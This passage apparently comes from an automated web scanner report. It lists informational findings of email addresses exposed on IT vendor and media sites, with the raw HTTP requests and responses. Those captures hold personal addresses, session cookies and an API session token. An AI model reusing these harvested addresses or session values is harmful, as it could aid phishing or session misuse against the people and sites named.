Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32598374.1678495615.1316237218.1316237218.1316237218.1; __utmb=32598374.12.10.1316237218; __utmc=32598374; __utmz=32598374.1316237218.1.1.utmcsr=google|utmccn=Campaign%20|utmcmd=cpc|utmctr=VDI

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 17 Sep 2011 00:29:59 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Cache-Control: private
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Vary: Accept-Encoding
Content-Length: 25675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml">

<head><meta name="
...[SNIP]...
<a href="mailto:sales@itoncommand.com?subject=Web Inquiry" class="style39">
...[SNIP]...
<a href="mailto:helpdesk@itoncommand.com?subject=Helpdesk request from web site" class="style39">
...[SNIP]...
<!-- a href="mailto:anueske@itoncommand.com?subject=Get A Quote"-->
...[SNIP]...

20.53. http://www.itoncommand.com/GetAQuote.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itoncommand.com
Path:   /GetAQuote.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign%20 HTTP/1.1
Host: www.itoncommand.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop#pq=vdi&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=7&gs_id=w&xhr=t&q=vdi+hosting&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=vdi+hos&aq=0&aqi=g1g-v3&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 17 Sep 2011 00:25:45 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Cache-Control: private
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Vary: Accept-Encoding
Content-Length: 38069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml">

<head><meta name="
...[SNIP]...
<a href="mailto:sales@itoncommand.com?subject=Web Inquiry" class="style39">
...[SNIP]...
<a href="mailto:helpdesk@itoncommand.com?subject=Helpdesk request from web site" class="style39">
...[SNIP]...
<!-- a href="mailto:anueske@itoncommand.com?subject=Get A Quote"-->
...[SNIP]...

20.54. http://www.itoncommand.com/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itoncommand.com
Path:   /Login.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Login.aspx HTTP/1.1
Host: www.itoncommand.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/Support.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32598374.1678495615.1316237218.1316237218.1316237218.1; __utmb=32598374.10.10.1316237218; __utmc=32598374; __utmz=32598374.1316237218.1.1.utmcsr=google|utmccn=Campaign%20|utmcmd=cpc|utmctr=VDI

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 17 Sep 2011 00:29:54 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Cache-Control: private
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Vary: Accept-Encoding
Content-Length: 30165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml">

<head><meta name="
...[SNIP]...
<a href="mailto:sales@itoncommand.com?subject=Web Inquiry" class="style39">
...[SNIP]...
<a href="mailto:helpdesk@itoncommand.com?subject=Helpdesk request from web site" class="style39">
...[SNIP]...
<!-- a href="mailto:anueske@itoncommand.com?subject=Get A Quote"-->
...[SNIP]...

20.55. http://www.itoncommand.com/Products.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itoncommand.com
Path:   /Products.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Products.aspx HTTP/1.1
Host: www.itoncommand.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32598374.1678495615.1316237218.1316237218.1316237218.1; __utmb=32598374.1.10.1316237218; __utmc=32598374; __utmz=32598374.1316237218.1.1.utmcsr=google|utmccn=Campaign%20|utmcmd=cpc|utmctr=VDI

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 17 Sep 2011 00:28:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Cache-Control: private
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Vary: Accept-Encoding
Content-Length: 27300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml">

<head><meta name="
...[SNIP]...
<a href="mailto:sales@itoncommand.com?subject=Web Inquiry" class="style39">
...[SNIP]...
<a href="mailto:helpdesk@itoncommand.com?subject=Helpdesk request from web site" class="style39">
...[SNIP]...
<!-- a href="mailto:anueske@itoncommand.com?subject=Get A Quote"-->
...[SNIP]...

20.56. http://www.itoncommand.com/Support.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itoncommand.com
Path:   /Support.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Support.aspx HTTP/1.1
Host: www.itoncommand.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/Awards.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32598374.1678495615.1316237218.1316237218.1316237218.1; __utmb=32598374.9.10.1316237218; __utmc=32598374; __utmz=32598374.1316237218.1.1.utmcsr=google|utmccn=Campaign%20|utmcmd=cpc|utmctr=VDI

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 17 Sep 2011 00:29:51 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Cache-Control: private
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Vary: Accept-Encoding
Content-Length: 28023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml">

<head><meta name="
...[SNIP]...
<a href="mailto:sales@itoncommand.com?subject=Web Inquiry" class="style39">
...[SNIP]...
<a href="mailto:helpdesk@itoncommand.com?subject=Helpdesk request from web site" class="style39">
...[SNIP]...
<!-- a href="mailto:anueske@itoncommand.com?subject=Get A Quote"-->
...[SNIP]...

20.57. http://www.itoncommand.com/WhyIToC.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itoncommand.com
Path:   /WhyIToC.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /WhyIToC.aspx HTTP/1.1
Host: www.itoncommand.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/hosteddesktop.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32598374.1678495615.1316237218.1316237218.1316237218.1; __utmb=32598374.7.10.1316237218; __utmc=32598374; __utmz=32598374.1316237218.1.1.utmcsr=google|utmccn=Campaign%20|utmcmd=cpc|utmctr=VDI

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 17 Sep 2011 00:29:29 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Cache-Control: private
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Vary: Accept-Encoding
Content-Length: 28580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml">

<head><meta name="
...[SNIP]...
<a href="mailto:sales@itoncommand.com?subject=Web Inquiry" class="style39">
...[SNIP]...
<a href="mailto:helpdesk@itoncommand.com?subject=Helpdesk request from web site" class="style39">
...[SNIP]...
<!-- a href="mailto:anueske@itoncommand.com?subject=Get A Quote"-->
...[SNIP]...

20.58. http://www.itoncommand.com/demo/xxxx_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itoncommand.com
Path:   /demo/xxxx_main.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /demo/xxxx_main.html HTTP/1.1
Host: www.itoncommand.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/demo/VynamicsDemoMod.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32598374.1678495615.1316237218.1316237218.1316237218.1; __utmb=32598374.13.10.1316237218; __utmc=32598374; __utmz=32598374.1316237218.1.1.utmcsr=google|utmccn=Campaign%20|utmcmd=cpc|utmctr=VDI

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 6545
Date: Sat, 17 Sep 2011 00:30:17 GMT
Content-Type: text/html
ETag: "08bda906930c81:0"
Server: Microsoft-IIS/7.0
Last-Modified: Mon, 26 Nov 2007 20:18:54 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Vary: Accept-Encoding

&www=www.vynamics.com &comp_name=VYNAMICS &slogan1=Contact Us&slogan2=Get a Quote&slogan3=EXPERIENCED...&contact1=John Smith <br>CEO <br><i>click to contact</i>&contact2=Chuck Mcune <br>VP <br>
...[SNIP]...
</i>&contact1_email=info@vynamics.com&contact2_email=info@vynamics.com&contact3_email=info@vynamics.com&contact4_email=info@vynamics.com&contact5_email=info@vynamics.com&button1=INTRODUCTION&button2=MEET THE TEAM&button3=HOW IT WORKS&button4=TURN ON THE POWER&button5=TESTIMONIALS&button11=&button22=&button33=&button44=&button55=&privacy=Privacy p
...[SNIP]...
<u>info@ccdvynamics.com</u>
...[SNIP]...

20.59. http://www.itoncommand.com/hosteddesktop.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itoncommand.com
Path:   /hosteddesktop.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /hosteddesktop.aspx HTTP/1.1
Host: www.itoncommand.com
Proxy-Connection: keep-alive
Referer: http://www.itoncommand.com/Products.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32598374.1678495615.1316237218.1316237218.1316237218.1; __utmb=32598374.4.10.1316237218; __utmc=32598374; __utmz=32598374.1316237218.1.1.utmcsr=google|utmccn=Campaign%20|utmcmd=cpc|utmctr=VDI

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 17 Sep 2011 00:29:05 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Cache-Control: private
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Vary: Accept-Encoding
Content-Length: 30334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml">

<head><meta name="
...[SNIP]...
<a href="mailto:sales@itoncommand.com?subject=Web Inquiry" class="style39">
...[SNIP]...
<a href="mailto:helpdesk@itoncommand.com?subject=Helpdesk request from web site" class="style39">
...[SNIP]...
<!-- a href="mailto:anueske@itoncommand.com?subject=Get A Quote"-->
...[SNIP]...

20.60. http://www.kaltura.com//api_v3/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The following email address was disclosed in the response:

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:11 GMT
Server: Apache
X-Kaltura: cached-dispatcher,a7db0b136c38676cd893ee0b05d20489,8.0108642578125E-5
Cache-Control: private, max-age=60 max-stale=0
Expires: Sat, 17 Sep 2011 00:53:11GMT
Last-Modified: Sat, 17 Sep 2011 00:52:11GMT
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 4056
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><objectType>KalturaMediaEntry</objectType><id>1_6mbkzzuu</id><name>Stevie Wonder: It&apos;s a Case of Steve Jobs Leading the Blind</name><descr
...[SNIP]...
<userId>melissa.chionchio@tmz.com</userId>
...[SNIP]...

20.61. http://www.matrix42.com/downloads/wp-vdi-demystified/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.matrix42.com
Path:   /downloads/wp-vdi-demystified/

Issue detail

The following email address was disclosed in the response:

Request

GET /downloads/wp-vdi-demystified/?gclid=CLGJxqyCo6sCFWYbQgodY3FG1w HTTP/1.1
Host: www.matrix42.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop#pq=vdi&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=7&gs_id=w&xhr=t&q=vdi+hosting&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=vdi+hos&aq=0&aqi=g1g-v3&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:25:32 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 48990
Content-Type: text/html; charset=iso-8859-1

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
<a href="mailto:info@matrix42.com" title="-" class="footer-right-link" >info@matrix42.com</a>
...[SNIP]...

20.62. http://www.matrix42.com/typo3/sysext/cms/tslib/media/scripts/jsfunc.layermenu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.matrix42.com
Path:   /typo3/sysext/cms/tslib/media/scripts/jsfunc.layermenu.js

Issue detail

The following email address was disclosed in the response:

Request

GET /typo3/sysext/cms/tslib/media/scripts/jsfunc.layermenu.js HTTP/1.1
Host: www.matrix42.com
Proxy-Connection: keep-alive
Referer: http://www.matrix42.com/downloads/wp-vdi-demystified/?gclid=CLGJxqyCo6sCFWYbQgodY3FG1w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=721gl7390nj2pm26demj4h2ha7; fe_typo_user=8fd7138ee5b020a91ffe719a02122e94

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:25:34 GMT
Server: Apache/2.2
Last-Modified: Fri, 29 Jul 2011 09:11:14 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: must-revalidate
Content-Length: 7759
Content-Type: application/x-javascript

/***************************************************************
*
* JavaScript DHTML layer menu
*
* $Id$
*
*
*
* Copyright notice
*
* (c) 1998-2010 Kasper Sk.rh.j
* All rights reserved
*
* This
...[SNIP]...
<kasper@typo3.com>
...[SNIP]...

20.63. http://www.microsenseindia.com/js/jcarousellite_1.0.1.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsenseindia.com
Path:   /js/jcarousellite_1.0.1.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jcarousellite_1.0.1.js HTTP/1.1
Host: www.microsenseindia.com
Proxy-Connection: keep-alive
Referer: http://www.microsenseindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 16 Feb 2010 23:33:46 GMT
Accept-Ranges: bytes
ETag: "0e9aa7b60afca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:45:38 GMT
Content-Length: 14329

/**
* jCarouselLite - jQuery plugin to navigate images/any content in a carousel style widget.
* @requires jQuery v1.2 or above
*
* http://gmarwaha.com/jquery/jcarousellite/
*
* Copyright
...[SNIP]...
llbacks. The functions will be passed an argument that represents an array of elements that
* are visible at the time of callback.
*
*
* @cat Plugins/Image Gallery
* @author Ganeshji Marwaha/ganeshread@gmail.com
*/

(function($) { // Compliant with jquery.noConflict()
$.fn.jCarouselLite = function(o) {
o = $.extend({
btnPrev: null,
btnNext:
...[SNIP]...

20.64. http://www.mitzmara.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mitzmara.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.mitzmara.com
Proxy-Connection: keep-alive
Referer: http://www.aradial.com/aradial-radius-server-billing-customers.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:45:45 GMT
Server: Apache
Last-Modified: Wed, 08 Jul 2009 03:15:22 GMT
Accept-Ranges: bytes
Content-Length: 27521
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<title>Mitzmara ICT Techn
...[SNIP]...
<area shape="circle" coords="45,9,7" href="mailto:sales@mitzmara.com" alt="Contact Us">
...[SNIP]...

20.65. http://www.mitzmara.com/media%20relations.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mitzmara.com
Path:   /media%20relations.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /media%20relations.htm HTTP/1.1
Host: www.mitzmara.com
Proxy-Connection: keep-alive
Referer: http://www.mitzmara.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:23 GMT
Server: Apache
Last-Modified: Wed, 08 Jul 2009 01:54:12 GMT
Accept-Ranges: bytes
Content-Length: 23288
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Kyocera</title>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<area shape="circle" coords="45,9,7" href="mailto:sales@mitzmara.com" alt="Contact Us">
...[SNIP]...
<a href="mailto:corpcom@mitzmara.com"></a></span><a href="mailto:corpcom@mitzmara.com">corpcomm@mitzmara.com </a>
...[SNIP]...
<a href="mailto:corpcom@mitzmara.com">corpcomm@mitzmara.com </a>
...[SNIP]...

20.66. http://www.open.com.au/cgi-bin/sf.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.open.com.au
Path:   /cgi-bin/sf.cgi

Issue detail

The following email address was disclosed in the response:

Request

POST /cgi-bin/sf.cgi HTTP/1.1
Host: www.open.com.au
Proxy-Connection: keep-alive
Referer: http://www.open.com.au/radiator/evaluation.html
Content-Length: 256
Cache-Control: max-age=0
Origin: http://www.open.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

formname=Radiator+eval&config=radiatoreval.cfg&companyname=&address1=&address2=&city=&state=&postcode=&country=&contactname=&contactemail=&contactphone=&environment=&selection=&testplan=&select=-----P
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:01 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 751

<html><head><title>Form Error</title></head>
<body><h1>Form Error</h1>
<strong>Your form was not successfully processed
because an error was encountered:</strong>
<p>Mandatory field 'address1' not pr
...[SNIP]...
<a href="mailto:webmaster@open.com.au">&lt;webmaster@open.com.au&gt;</a>
...[SNIP]...

20.67. http://www.open.com.au/howtobuy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.open.com.au
Path:   /howtobuy.html

Issue detail

The following email address was disclosed in the response:

Request

GET /howtobuy.html HTTP/1.1
Host: www.open.com.au
Proxy-Connection: keep-alive
Referer: http://www.open.com.au/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 12 May 2011 00:33:31 GMT
ETag: "2382dd-4818-56ac2cc0"
Accept-Ranges: bytes
Content-Length: 18456
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OSC How to Buy</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<style type=
...[SNIP]...
<a href="mailto:info@open.com.au">info@open.com.au</a>
...[SNIP]...
<a href="mailto:info@open.com.au">
...[SNIP]...

20.68. http://www.open.com.au/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.open.com.au
Path:   /index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /index.html HTTP/1.1
Host: www.open.com.au
Proxy-Connection: keep-alive
Referer: http://www.open.com.au/radiator/features.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:12 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 14 Sep 2011 01:57:59 GMT
ETag: "2381c2-4601-16e997c0"
Accept-Ranges: bytes
Content-Length: 17921
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OSC Index</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/c
